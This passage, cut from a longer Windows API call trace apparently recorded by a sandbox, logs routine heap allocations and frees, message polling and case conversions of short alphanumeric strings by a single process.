lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.428] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0258.429] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.429] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.429] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0258.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0258.429] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.430] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0258.431] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.431] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0258.432] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.432] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.433] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0258.433] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.433] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0258.434] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.434] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.435] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.435] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.435] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0258.436] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0258.436] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0258.436] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.436] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8b0 [0258.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.437] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.437] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.437] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0258.437] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7978 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | 